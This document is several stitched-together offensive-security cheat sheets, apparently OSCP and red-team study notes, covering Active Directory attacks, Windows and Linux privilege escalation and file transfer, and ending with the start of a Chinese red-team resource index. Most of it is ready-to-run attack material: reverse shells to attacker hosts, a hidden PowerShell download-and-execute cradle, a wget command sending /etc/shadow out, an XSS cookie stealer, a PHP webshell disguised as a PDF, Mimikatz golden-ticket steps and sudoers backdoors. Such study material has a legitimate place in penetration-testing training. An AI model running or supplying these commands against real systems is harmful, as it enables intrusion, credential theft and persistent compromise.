c:\system ``` Decrypt secretsdump ``` secretsdump.py -sam sam -system system LOCAL ``` ### ldapdomaindump ``` service apache2 start ``` ``` ldapdomaindump -u 'domain.local\user' -p 'password' targetIP ``` ### BloodHound ``` neo4j console ``` ``` bloodhound &>/dev/null & ``` ``` disown ``` #### Collection Method Remote collection (--dns-tcp with proxychains) ``` bloodhound-python -u USER -p PASSWORD -ns IP -d domain.local -c All ``` Local Collection [SharpHound](https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors) ``` Invoke-BloodHound -CollectionMethod All ``` ### [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) Domain Info ``` Get-NetDomain ``` Domain Controller Info ``` Get-NetDomainController ``` Policies in the Domain ``` Get-DomainPolicy ``` Passwords Policy ``` (Get-DomainPolicy).SystemAccess ``` Users enum ``` Get-NetUser | select cn ``` Users description ``` Get-NetUser | select samaccountname, description ``` Groups enum ``` Get-NetGroup | select name ``` Groups where admin are involved ``` Get-NetGroup *admin* | select name ``` Users of a group ``` Get-NetGroupMember "Domain Admins" ``` Kerberoasting users ``` Get-DomainUser -SPN | select name ``` Kerberos info (Golden Tickets) ``` (Get-DomainPolicy -Policy Domain).KerberosPolicy ``` Computers enum ``` Get-NetComputer | select samaccountname ``` Computers OS ``` Get-NetComputer | select OperatingSystem ``` Look for shares ``` Invoke-ShareFinder ``` Get GPOs ``` Get-NetGPO | select displayname ``` ### Mimikatz Check privileges ``` privilege::debug ``` Enable wdigest ``` reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 ``` Read lsass.exe ``` sekurlsa::logonpasswords ``` Read SAM ``` lsadump::sam ``` Dump LSA ``` lsadump::lsa /patch ``` #### Golden Ticket Dump KRBTGT info (get Domain SID and NTLM Primary hash) ``` lsadump::lsa /inject /name:krbtgt ``` Create the GT (/ticket:file.kirbi instead of /ptt to save the GT) ``` kerberos::golden /User:Administrator /domain:domain.local /sid:SID /krbtgt:NTLM_HASH /id:500 (Admin ID) /ptt ``` Launch cmd.exe ``` misc::cmd ``` Use the GT ``` kerberos::ptt file.kirbi ``` #### Persistence Reverse Shell with startup ``` %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\autoreverse.exe ``` Create a domain admin user ``` net group "domain adminis" USER /add /domain ``` Create a Administrator.ccache ``` ticketer.py -nthash NTLM -domain-sid SID -domain domain.local Administrator ``` Create the variable KRB5CCNAME ``` export KRB5CCNAME='/full/path/of/Administrator.ccache' ``` Usage: ``` psexec.py -n -k domain.local/Administrator@PC-NAME ``` ## Privilege Escalation ### Tryhackme room ``` https://tryhackme.com/room/windowsprivescarena ``` ## Service Escalation - Registry Check if your user belongs to a group that has full control over a registry key ``` Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl ``` Copy the file of the registry to your kali machien and edit the code ``` cmd.exe /k net localgroup administrators user /add ``` Compile it ``` x86_64-w64-mingw32-gcc windows_service.c -o x.exe ``` Copy the file to the Windows VM and type ``` reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f ``` ``` sc start regsvc ``` ## Always Installed Check if the "AlwaysInstallElevated" is 1 ``` reg query HKLM\Software\Policies\Microsoft\Windows\Installer ``` ``` reg query HKCU\Software\Policies\Microsoft\Windows\Installer ``` Create a .msi payload ``` msfvenom -p windows/meterpreter/reverse_tcp lhost=IP -f msi -o setup.msi ``` Set up a listener ``` msfconsole; use multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost <IP>; exploit ``` Execute the .msi payload ``` msiexec /quiet /qn /i C:\Temp\setup.msi ``` ### SeImpersonatePrivilege ([GodPotato.exe](https://github.com/BeichenDream/GodPotato)) ``` .\GodPotato -cmd "cmd /c C:\PATH\TO\nc.exe -e C:\Windows\System32\cmd.exe ATTACKER_IP ATTACKER_PORT" ``` ### Windows Exploit Sugester [Github](https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py) Download Database ``` python2 windows-exploit-suggester.py -u ``` Search for exploits ([E] means Privilege Escalation) ``` python2 windows-exploit-suggester.py -d database.xls -i systeminfo.txt ```
![](https://images.credly.com/images/e3c9ad3c-b142-45ae-bb2b-2f19ff2b742a/PWK-OSCP-badge.png) ### OSCP Exam now has some major changes .... Those are - ![OSCP](OSCP-NEW.png) ![OSCP](OSCP-Changes.png) *Ping Sweep* namp -v -sn 10.11.1.1-254 -oG ping sweep.txt grep Up ping-sweep.txt | cut -d “ ” -f 2 **Find ports** *Fast UDP* nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T3 -oN /root/result.txt <ip> -sU UDP Scan *Shell Script* #!/bin/bash if [ "$1" == "" ] || [ "$2" == "" ]; then echo "Arguments missing usage: <target_ip> <path to log>" exit 0 fi sudo nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T3 -oN $2 $1 *TLS intensive* nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oN /root/desktop/result.txt <ip> -Pn Do not ping the host -sS Stealth Scan --stats-every 3m Every 3 Min information should come back --max-retries 1 Only try once --max-scan-delay 20 nmap should wait a specific time - avoid rait limit --defeat-rst-ratelimit don't send ack just send rst to much ack can trigger rait limit - for filtered ports -T4 Intesitiy of 4 -p1-65535 scan all ports -oN <where to save it> save the result to a specific file <ip> ip e.g. *Shell Script* #!/bin/bash if [ "$1" == "" ] || [ "$2" == "" ]; then echo "Arguments missing usage: <target_ip> <path to log>" exit 0 fi sudo nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oN $2 $1 *Specific Ports Scan* nmap -Pn -nvv -p 22,80,8080 --version-intensity 9 -A -oN /home/kali/Desktop/result.txt <ip> -nvv -Pn -p 22,80,111,139 --version intensity 9 -A -oN /root/result.txt <ip> *Shell Script* #!/bin/bash if [ "$1" == "" ] || [ "$2" == "" ] || [ "$3" == "" ]; then echo "Arguments missing usage: <target_ip> <ports to scan e.g: 80,443> <path to log>" exit 0 fi sudo nmap -Pn -nvv -p $2 --version-intensity 9 -A -oN $3 $1 **Enumeration** All kind of enumeration topics *Curl the page* curl -v -X Options <ip> **Search for Directories** *dirb* dirb <url> *dirbuster - with UI* dirbuster Good to download a wordlist from github take a big one and remove "manual" *gobuster* gobuster dir -u <ip> -w /usr/share/wordlists/x #### dirsearch ```dirsearch -u <url>``` #### feroxbuster ```feroxbuster --ur <url>``` **Enumeration** *Wordpress Scan* Plugins are having the potential of beeing outdated. wpscan --url <url> --enumerate ap,at,cd,dbe ap - include all Plugins at - include all themes cb - include all coonfig backups dbe - database exports Check WP Logins by dir wpscan --url <url> --passwords /location/of/wordlist --usernames <name> *analysis for vulnerabilities* nikto -h <ip> + port :80 or :443 *SMB Enumeration* enum4linux -> SMB Client RPC Client NAT and MB Lookup Has config bug locate smb.conf vim smb.conf under global add: client use spnego = no client ntlmv2 auth = no *enum4linux <ip>* find out SAMBA Version msfconsole search smb search for an auxiliary scanner for smb with meatsploit use auxiliary/scanner/smb/smb_version put info - includes show options set rhost <ip> exploit --> gives you the version searchsploit samba 2.2 see exploits compare them to exploit-db nbtscan <ip> - gives you basic info like NetBIOS Name smbclient -L <ip> SAMBA is a good source for exploits *Mount SMB share* https://unix.stackexchange.com/questions/387468/mounting-a-windows-shared-drive-to-kali-linux to understand what shares are available smbclient -L hostname -I <ip> to mount the folder mount //<ip>/<sharename> /media/<local_name> -o username=user *Gaining Root with Metasploit* msfconsole search trans2open - use linux version show targets - there can be a lot of them show Options - to see the payload If a static payload is set (to be seen by / in the path it can maybe not work). Solution is to replace that with a generic payload. https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/ Generic (non staged): set payload generic/shell_reverse_tcp Staged: set payload generic/shell/reverse_tcp exploit maybe leads to success If it fails first try is the payload, then maybe it is the port. **DNS Enumeration** *zonetransfer* DNS Server host -t ns zonetransfer.me Mail Server host -t mx zonetransfer.me Host Information host zonetransfer.me Zonetransfer information host -l zonetransfer.me <name server> gives you unique dns/ip addresses *dnsrecon* dnsrecon -d zonetransfer.me -t axfr axfr - for Zonetransfer *dnsenum* dnsenum zonetransfer.me its more clean and faster as the other ones **other types** -FTP -SNMP -SMTP **NetCat** try connect to an open port nc -nv <ip> <port> listening shell nc -nvlp <port> connect nc -nv <ip> <port> -e cmd.exe -e execute **Bruteforce attacks** *Hydra for SSH* Sample to attack Kioptrix locate wordlists hydra -v -l root -P /usr/share/wordlists/rockyou.txt <ip> ssh -v - verbose mode -P - Passwordlist **XSS and MySQL FILE** https://www.vulnhub.com/entry/pentester-lab-xss-and-mysql-file,66/ Only ISO for 64 bit Debian 64 and Live image *XSS* <script>alert('xss')</script> create index.php and put it in the home directory of the user you will run it with <?php $cookie = isset($_GET["test"])?$_GET['test']:""; ?> install it in a apache server run php service apache2 stop php -S 10.0.2.6:80 in the vulnerable field enter <script>location.href='http://10.0.2.6/index.php?test='+document.cookie;</script> *SQL injection* https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/ *SQLMap* Look for anything that looks like it trigger a sql query. Admin page requests posts with "id=1" in the URI. That is a good indicator that sql injection is possible here. For testing sqlmap -u "http://10.0.2.7/admin/edit.php?id=1" --cookie=PHPSESSID=<id> For dumping sqlmap -u "http://10.0.2.7/admin/edit.php?id=1" --cookie=PHPSESSID=<id> --dump For getting a shell sqlmap -u "http://10.0.2.7/admin/edit.php?id=1" --cookie=PHPSESSID=<id> --os-shell **Local File Inclusion (LFI)** https://www.vulnhub.com/entry/pentester-lab-php-include-and-post-exploitation,79/ Nikto nikto -h 10.0.2.8 Directory Traversal ../../../../../../../../../../etc/passwd doesn't work Adding a null byte does the trick until php 5.3 ../../../../../../../../../../etc/passwd%00 Inject a file -> Submit allows to upload a pdf. Create a file that has a pdf header but contains php otherwise. *shell.pdf* %PDF-1.4 <?php system($_GET["cmd"]); ?> that goes to upload page and can trigger a command http://10.0.2.8/index.php?page=uploads/shell.pdf%00&cmd=whoami Shellcode to create a reverse shell https://github.com/GammaG/php-reverse-shell Get the php file and change the ip and port where the shell should connect to. nc -nvlp 4444 In Browser: http://10.0.2.8/index.php?page=uploads/reverseshell.pdf%00 *Privilage Escalation* find a folder with full rights -> tmp **Remote File Inclusion (RFI)** Host a file yourself and let the victim download it *Damn Vulnerable Web Application (DVWA)* http://www.dvwa.co.uk/ *Generate Reverse shell msfvenom* msfvenom -p php/meterpreter/revese_tcp LHOST=<host ip> LPORT=4444 >> exploit.php host the file with python server service apache2 stop python -m SimpleHTTPServer 80 python give you debug information *Setup meterpreter* alternative to nc - only once allowed in OSCP better use nc sudo msfconsole -q -x "use exploit/multi/handler;\ set payload php/meterpreter/reverse_tcp;\ set LHOST 192.168.134.129;\ set LPORT 4444 ;\ run" -q - start quietly -x - passing payload settings on DVWA the page is called via parameter "?page=" enter here the malicious page as goal dvwa.com/vulnerabilites/fi/?page=http://10.0.2.6/exploit.php **File Transfer** *Put with nmap* nmap -p 80 10.0.2.11 --script http-put --script-args http-put.url='<target path>',http-put.file='<local path>' *Get with SCP* scp <user>@<ip>:<filename> <target> *ftp hosting with python* apt-get install python-pyftpdlib go to the folder you want to use python -m pyftpdlib -p 21 p for port *get files over windows shell* ftp <ip> binary - so the files are having the correct chars *script it* echo open <ip> ftp.txt echo anonymous >> ftp.txt echo pass >> ftp.txt echo get exploit.php >> ftp.txt echo bye >> gtp.txt ftp -s:ftp.txt There should not be spaces in there *host with msfconsole* use auxiliary/server/ftp exploit For old windows machines *TFTP* On Linux atftpd --daemon --port 69 /var/www/html On Windows tftp -i <ip> get exploit.php *Powershell* echo $storage = $pwd > get.ps1 echo $webclient = New-Object System.Net.Webclient >> get.ps1 echo $url = "http://<ip>/exploit.php" >> get.ps1 echo $file = "exploit.php" >> get.ps1 echo $webclient.DownloadFile($url,$file) >> get.ps1 powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1 Also works as oneliner echo $storage = $pwd&$webclient = New-Object System.Net.Webclient&$url = "http://<ip>/exploit.php"&$file = "exploit.php"&$webclient.DownloadFile($url,$file) >> get.ps1 *Powershell One-Liner* powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('<url>',"$env:APPDATA\ps.exe");Start-Process ("$env:APPDATA\ps.exe") ## Version1 c:\Windows\System32\cmd.exe /c powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('<url>')" ## Version2 c:\windows\system32\cmd.exe /c PowErsHelL.EXE -eXecUtiONPoLICy bYPass -NOPROfilE -WinDoWSTYlE hiDden -EnCodeDcOmmAnd <base64 Command> **Privilege Escalation** Guides for privilege Escalation Basic Pentesting 1 OVA https://www.vulnhub.com/entry/basic-pentesting-1,216/ *Guides* **Windows** https://www.fuzzysecurity.com/tutorials/16.html *Windows-PrivEsc-Checklist* https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation *Analysis Tools* Executable - winPEAS.exe https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS Deployment with Visual Studio Required - Seatbelt.exe https://github.com/GhostPack/Seatbelt - Watson.exe https://github.com/rasta-mouse/Watson - SharpUp.exe https://github.com/GhostPack/SharpUp PowerShell - Sherlock.ps1 https://github.com/rasta-mouse/Sherlock - PowerUp.ps1 https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc - jaws-enum.ps1 https://github.com/411Hall/JAWS Other - windows-exploit-suggester.py https://github.com/AonCyberLabs/Windows-Exploit-Suggester python2 -m pip install xlrd --upgrade python2 windows-exploit-suggester.py --update --gives the database for vulnerabilities C:\>systeminfo > win7sp1-systeminfo.txt python2 windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt - exploit suggester (metasploit) https://blog.rapid7.com/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/ **Linux** https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ *Admin Shell upload - Wordpress* Will create a reverse shell with a php shell and cleanup on its own. Need Wordpress admin access. use exploit/unix/webapp/wp_admin_shell_upload *Find the Kernel version* uname -a -> on the local maschine *Linuxprivchecker* https://github.com/GammaG/linuxprivchecker Then put in it apache directory. On the target machine make a file transfer to pull this. This is the python version, but there are alternative versions. Copy the kernel as first thing and check if there is any exploits available. Check World Writeable Files (maybe passwd is in there) End the Channel und go back to Meterpreter edit /etc/passwd (works as vi) Open another terminal to generate the pw hash openssl passwd --help openssl passwd -1 (gives you an md5 hash) Go back to meterpreter paste the hash instead of the "x" for root shell python -c 'import pty; pty.spawn("/bin/bash")' su root **Windows Enumeration** *Check vulnerable services* List all the running services on the maschine that are automatically started and non standard. wmic service get name,displayname,pathname,startmode |findstr /i "auto"|findstr /i /v "c:\windows" |findstr /i /v "\"" wmic - gives a list of all running services /i - makes the search case insensitive /v ignores anything that contains the given String Possible finding C:\Program Files\... --> can be used by putting a file with name Files.exe under C:\Program *check dir permissions* icacls "path" *check for local admin* net localgroup administrators *check user permissions* whoami /priv *Generate Payload* msfvenom -p windows/meterpreter/reverse_tcp LHOST=<url> LPORT=<port> -e x86/shikata_ga_nai -i 7 -f raw > shell.bin -i - means the iterations shikata ga nai will execute on the payload Inject the payload in a trustworthy exe like whoami.exe with the help of shellter *Msfconsole meterpreter* msfconsole -q -x "use exploit/multi/handler;\ set PAYLOAD windows/meterpreter/reverse_tcp;\ set AutoRunScript post/windows/manage/migrate;\ set LHOST <ip>;\ set LPORT <port>;\ run" This will start a session handler and wait for incomming reverse shell requests. Then directly automigrate the process to a new process. *Set password for windows account* net user <accountname> <password> **Linux Enumeration** *ARP* Show ARP Communication old: arp -a new: ip neigh Search for Passwords in the whole system grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2> /dev/null locate password | more *Search for Subdomains* Get the list from here https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-5000.txt wfuzz -c -f sub-fighter -w top5000.txt -u '<url>' -H "HOST: FUZZ.<url>" --hw 290 --hw 290 to take out 404 pages **Post Exploitation** *Linux Post Exploitation* https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List /bin/netstat -ano - to get open connections, maybe to get access to different networks Search for flags as well *Windows Post Exploitation* pwdump7 https://www.tarasco.org/security/pwdump_7/ locate in Kali and transfer these files fgdump wce *Unshadow* Try to decrypt passwd and shadow file unshadow PASSWORD-FILE SHADOW-FILE remove everything expect the users *Hashcat* Identifiy the Algorithmus used for account creation https://hashcat.net/wiki/doku.php?id=example_hashes hashcat64.exe -m Algorithm_Type_number cred.txt rockyou.txt -O for example (1800) *GTFOBins* Show what a user is allowed to execute as sudo without giving a password sudo -l Exploit what is possible with that - search for GTFOBins https://gtfobins.github.io/ Use to escalate *wget - Push /etc/shadow to remote location* sudo wget --post-file=/etc/shadow <IP>:<PORT> Receive the file in NetCat nc -nvlp <PORT> *LD_PRELOAD* if sudo -l gives you back and you have at least one entry that allows sudo without pw env_keep+=LD_PRELOAD create a file - shell.c - with the following content to escalate #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init(){ unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); } compile it with gcc -fPIC -shared -o shell.so shell.c -nostartfiles start it with sudo LD_PRELOAD=/home/USER/shell.so <something that can be executed as sudo e.g. apache2> *FTP push file* ftp-upload -h {HOST} -u {USERNAME} --password {PASSWORD} -d {SERVER_DIRECTORY} {FILE_TO_UPLOAD} *Capabilities* Get a list of programs that are allowed to be executed as root by the current user. Only works if +ep is present. getcap -r / 2>/dev/null Result should be something like this: /usr/bin/python = cap_setuid+ed Get root with python python -c 'import os; os.setuid(0); os.system("/bin/bash")' *Create Root Bash* echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' For execution: /tmp/bash -p *Use tar when wildcard is in use* echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > target_path/shell.sh chmod +x shell.sh touch /home/andre/backup/--checkpoint=1 touch /home/andre/backup/--checkpoint-action=exec=sh\ shell.sh When bash shows up /tmp/bash -p *NFS Mounting* it's based on root squash cat /etc/exports only works if something shows here with "no_root_squash" showmount -e <ip> mkdir /tmp/mountme mount -o rw,vers=2 <target_ip>:/<mountable_folder> /tmp/mountme move over something like shell.c and gcc it + chmod +s it *TTY* If sudo -l shows tty is missing try to get a shell by using this: https://netsec.ws/?p=337 !exchange sh for bash python -c 'import pty; pty.spawn("/bin/bash")' echo os.system('/bin/bash') *Upgrade TTY further* Enables autocomplete in reverse shell and so on Close the connection Strg + z stty raw -echo fg + enter (twice) Back in the shell export TERM=xterm *Monitor Process unprivileged* https://github.com/DominicBreuker/pspy **Windows Post Exploitation** *Powershell Reverse Shell* $client = New-Object System.Net.Sockets.TCPClient("10.9.96.27",444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3 **Windows PW Cracking** *Crack Password Hash* john --wordlist=/root/rockyou.txt <dumpfile> john --show <dumpfile> *Online Hashcracker* Needs NTLM cracking for windows passwords. https://hashkiller.io/listmanager https://hashes.com/decrypt/basic https://crackstation.net/ *Export User Passwords* reg SAVE HKLM\SAM C:\SAM reg SAVE HKLM\SYSTEM C:\SYSTEM **Linux PW Cracking** Unshadow unshadow passwd shadow > unshadow.txt Cracking with John john --rules --wordlist=/root/rockyou.txt unshadow (will take forever) Alternative: hashcat -m 500 /root/rockyou.txt unshadow Good to export that to a different machine with a strong GPU (Tower) https://hashcat.net/hashcat/ https://resources.infosecinstitute.com/hashcat-tutorial-beginners/ **Pivoting** Tunneling into a different network via another machine. *Setup a lab* Go in virtual network editor Kali One Host-Only network with: Subnet IP 10.1.10.0 Mask 255.255.255.255 Windows in the middle Victim One Nat Network with: Subnet IP 192.168.134.0 Mask 255.255.255.0 *Metasploit* run autoroute -s 192.168.134.0/24 run autoroute -p **CTF Notes** *Reverse Shells* http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 *Docker* https://gtfobins.github.io/gtfobins/docker/ docker run -v /:/mnt --rm -it bash chroot /mnt sh bash maybe has to be changed into what is running *SUID* Get files that have the SUID Bit set First one is more clean find / -perm -u=s -type f 2>/dev/null find / -type f -perm -04000 -ls 2>/dev/null good entry point is systemctl https://gtfobins.github.io/ Search for systemcrl - SUID paste the lines each single env - is a good point here *Escalate SUID Manually* install strace for analysing what is called by an application strace patchToApplication 2>&1 | grep -i -E "open|access|no such file" Search for something that you as user have writing permissions Replace it with C script #include <stdio.h> #include <stdlib.h> static void inject() __attribute__((constructor)); void inject() { system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); } Compile with gcc -shared -fPIC -o /pathToDeployTo /PathOfTheSourceFile *Escalate with PATH manipulation* Create an alternative "service" file to execute. This will only with in combination with SUID. echo 'int main() { setgit(0); setuid(0); system("bin/bash"); return 0;}' > /tmp/service.c gcc /tmp/service.c -o /tmp/service export PATH=/tmp:$PATH *Reverse Shell one liner* http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet Make files downloadable sudo service apache2 start cp file /var/www/html id - gives you current rights *Priviledge Check* https://github.com/GammaG/linuxprivchecker *Create Reverse Shell* https://netsec.ws/?p=331 **Set up Meterpreter session** https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit *Generate the payload* msfvenom -p php/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 EXITFUNC=thread -f raw > shell.php https://github.com/pentestmonkey/php-reverse-shell *Meterpreter Session* ./msfconsole -q msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.1.123 lhost => 192.168.1.123 msf exploit(handler) > set lport 4444 lport => 4444 msf exploit(handler) > run shell - to get normal shell *Get file version (Depackage)* dpkg -l | grep <file> *Read exploits from searchsploit* /usr/share/exploitdb/exploits/linux/local/... *add local user to sudoers* echo 'chmod 777 /etc/sudoers && echo "<user> ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update chmod 777 on the file *push cron jobs* run-parts /etc/cron.daily *Call URL via console* curl <url> *Show open ports in kali* sudo netstat -tulpn *Malicious Plugin* sudo apt install seclists *Wordpress exploitation* Once seclists are installed it can be found in /usr/share/seclists and the plugin can be found under Web-Shells/WordPress. The malicious plugin is called "plugin-shell.php" *Connect to MySQL DB in Kali* mysql --host=<ip> --port=<port> --user= <user> -p ip - would be 127.0.0.1 in case of port forwarding port - the port where the portforward is running at RDP xfreerdp is preinstalled xfreerdp /d:<domain> /u:<user> /v:<target_ip> +clipboard *Crack PGP/GPG private key* https://www.openwall.com/lists/john-users/2015/11/17/1 gpg2john target/tryhackme.asc > target/hash john --wordlist=modules/rockyou.txt output gpg --allow-secret-key-import --import tryhackme.asc gpg --delete-secret-keys "tryhackme" *Writing space* Space can be written as ${IFS} so ls -la would be ls${IFS}-la Execute Bash/Sh script alternative to ./<script> you can also write bash <script> **Additional** Good for notes is Cherrytree. https://www.giuspen.com/cherrytree/#downl https://www.reddit.com/r/oscp/ **Mount shared Folder** #!/bin/bash sudo mount -t vboxsf share/~share
# Scripts ## Recon ```bash #!/bin/bash export rhost="" export dir_wordlist="/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" # Check if $rhost variable is empty if [ -z "$rhost" ]; then echo "Please enter the value for \$rhost:" read rhost fi # Check if directory wordlist exists if [ -f "$dir_wordlist" ]; then echo "File exists: $wordlist" else echo "File does not exist: $dir_wordlist" find / -name "directory-list-*" 2>/dev/null echo "Please enter directory for wordlist" read dir_wordlist fi # Print the value of $rhost echo "The value of \$rhost is: $rhost" nmap -sVC --min-rate 8888 -T4 $rhost -vv -oN nmap-$rhost.txt nmap -sV -T4 --script vuln --min-rate 8888 -vv -d -oN nmap-vuln.txt $rhost gobuster dir -u $rhost -w $dir_wordlist -t 50 | tee gobuster-$rhost.txt enum4linux -a $rhost | tee enum-$rhost.txt ``` ## PrivEsc for starters test this ``` sudo -l find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null ``` LinuxSmartEnumeration https://github.com/diego-treitos/linux-smart-enumeration ```bash wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh; chmod +x ./lse.sh # ./lse.sh : to look at overview # ./lse.sh -l 1 -i : to verbose ``` LinEnum https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh ```bash wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh # mkdir report # ./LinEnum.sh -k password -e report -t ```
# Awesome-Redteam **【免责声明】本项目所涉及的技术、思路和工具仅供学习,任何人不得将其用于非法用途和盈利,不得将其用于非授权渗透测试,否则后果自行承担,与本项目无关。使用本项目前请先阅读 [法律法规](https://github.com/Threekiii/Awesome-Laws)。** ## 快速导航 - [攻防渗透常用命令](https://github.com/Threekiii/Awesome-Redteam/blob/master/cheatsheets/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4%E9%80%9F%E6%9F%A5.md) - [重要端口及服务速查](https://github.com/Threekiii/Awesome-Redteam/blob/master/cheatsheets/%E9%87%8D%E8%A6%81%E7%AB%AF%E5%8F%A3%E5%8F%8A%E6%9C%8D%E5%8A%A1%E9%80%9F%E6%9F%A5.md) ## 目录 - [Awesome-Redteam](#awesome-redteam) - [快速导航](#快速导航) - [目录](#目录) - [项目导航](#项目导航) - [速查文档-CheatSheets](#速查文档-cheatsheets) - [一些代码-Scripts](#一些代码-scripts) - [攻防知识-Tips](#攻防知识-tips) - [服务搭建-Docs](#服务搭建-docs) - [开源导航](#开源导航) - [编解码/加解密综合](#编解码加解密综合) - [常见编解码/加解密](#常见编解码加解密) - [实用工具](#实用工具) - [威胁情报](#威胁情报) - [网络空间搜索](#网络空间搜索) - [公开知识库](#公开知识库) - [其他](#其他) - [信息收集](#信息收集) - [IP/域名](#ip域名) - [确认真实IP地址](#确认真实ip地址) - [多个地点Ping服务器](#多个地点ping服务器) - [IP反查域名](#ip反查域名) - [Whois注册信息反查](#whois注册信息反查) - [DNS数据聚合查询](#dns数据聚合查询) - [TLS证书信息查询](#tls证书信息查询) - [IP地址段收集](#ip地址段收集) - [指纹识别](#指纹识别) - [扫描/爆破](#扫描爆破) - [扫描/爆破工具](#扫描爆破工具) - [扫描/爆破字典](#扫描爆破字典) - [字典生成](#字典生成) - [默认口令查询](#默认口令查询) - [社会工程学](#社会工程学) - [公众号/小程序](#公众号小程序) - [浏览器](#浏览器) - [综合工具](#综合工具) - [漏洞研究](#漏洞研究) - [开源资源](#开源资源) - [靶机平台](#靶机平台) - [漏洞扫描](#漏洞扫描) - [POC库](#poc库) - [POC编写](#poc编写) - [综合工具](#综合工具-1) - [漏洞利用](#漏洞利用) - [辅助工具](#辅助工具) - [数据库](#数据库) - [信息泄露](#信息泄露) - [操作系统](#操作系统) - [Druid](#druid) - [Etcd](#etcd) - [Java](#java) - [Redis](#redis) - [Shiro](#shiro) - [Struts](#struts) - [Spring](#spring) - [Tomcat](#tomcat) - [Thinkphp](#thinkphp) - [Weblogic](#weblogic) - [Vcenter](#vcenter) - [Zookeeper](#zookeeper) - [CMS / OA](#cms--oa) - [Payload / Bypass](#payload--bypass) - [内网渗透](#内网渗透) - [内网探测](#内网探测) - [权限维持](#权限维持) - [免杀项目](#免杀项目) - [内网穿透](#内网穿透) - [密码提取](#密码提取) - [其他](#其他-1) - [逆向分析](#逆向分析) - [靶机平台](#靶机平台-1) - [综合工具](#综合工具-2) - [小程序](#小程序) - [APK](#apk) - [云安全](#云安全) - [云安全资源](#云安全资源) - [云安全矩阵](#云安全矩阵) - [云上靶场](#云上靶场) - [AK/SK](#aksk) - [开源蜜罐](#开源蜜罐) - [容器安全](#容器安全) - [必备工具](#必备工具) - [命令行](#命令行) - [Metasploit](#metasploit) - [Yakit](#yakit) - [Cobaltstrike Extensions](#cobaltstrike-extensions) - [Burpsuite Extensions](#burpsuite-extensions) - [Chrome Extensions](#chrome-extensions) - [其他优秀项目](#其他优秀项目) - [先mark待测试项目](#先mark待测试项目) - [使用姿势](#使用姿势) - [如何在Windows上使用alias](#如何在windows上使用alias) - [如何通过.bat运行conda环境下python文件](#如何通过bat运行conda环境下python文件) - [如何使用浏览器快速查看markdown文档](#如何使用浏览器快速查看markdown文档) ## 项目导航 ### 速查文档-CheatSheets - 攻防渗透常用命令速查:[Click Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/cheatsheets/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4%E9%80%9F%E6%9F%A5.md) - 常见WAF拦截页面速查:[Click 